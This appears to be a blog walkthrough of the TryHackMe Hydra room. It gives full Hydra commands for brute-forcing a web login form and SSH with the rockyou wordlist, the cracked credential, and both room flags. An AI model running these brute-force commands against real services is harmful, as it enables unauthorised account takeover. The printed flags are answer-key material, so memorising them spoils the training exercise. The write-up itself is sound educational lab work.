Back to blog
Apr 19, 2026
2 min read

TryHackMe — Hydra Walkthrough

This room demonstrates how Hydra can be used to brute-force online authentication across multiple protocols.

Open the target in a browser and use Developer Tools → Network to capture the login POST. A single failed login attempt produced the following:

  • POST path: /login
  • POST body fields: username and password
  • Failure string: Your username or password is incorrect.

We used these exact values in the http-post-form syntax required by Hydra.

Pasted image 20260419103420

Web brute force

Command used:

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.201.107.194 http-post-form “/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect.” -V -t 4

Pasted image 20260419103356 Pasted image 20260419103408

Post-exploit (retrieve flag1):

  • Log into the web app with molly:sunshine in the browser, or use curl to establish a session and pull likely flag paths. The web login revealed Flag 1:

Flag 1: THM{2673a7dd116de68e85c48ec0b1f2612e}

Pasted image 20260419103430

SSH brute force (flag2)

Command used:

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.201.107.194 -t 4 ssh -V

Pasted image 20260419103443

Post-exploit (SSH and flag retrieval):

ssh molly@10.201.107.194

Pasted image 20260419103449

pwd
ls -la
cat flag2.txt

**Flag 2 content (from /home/molly/flag2.txt):
**THM{c8eeb0468febbadea859baeb33b2541b}

Pasted image 20260419103459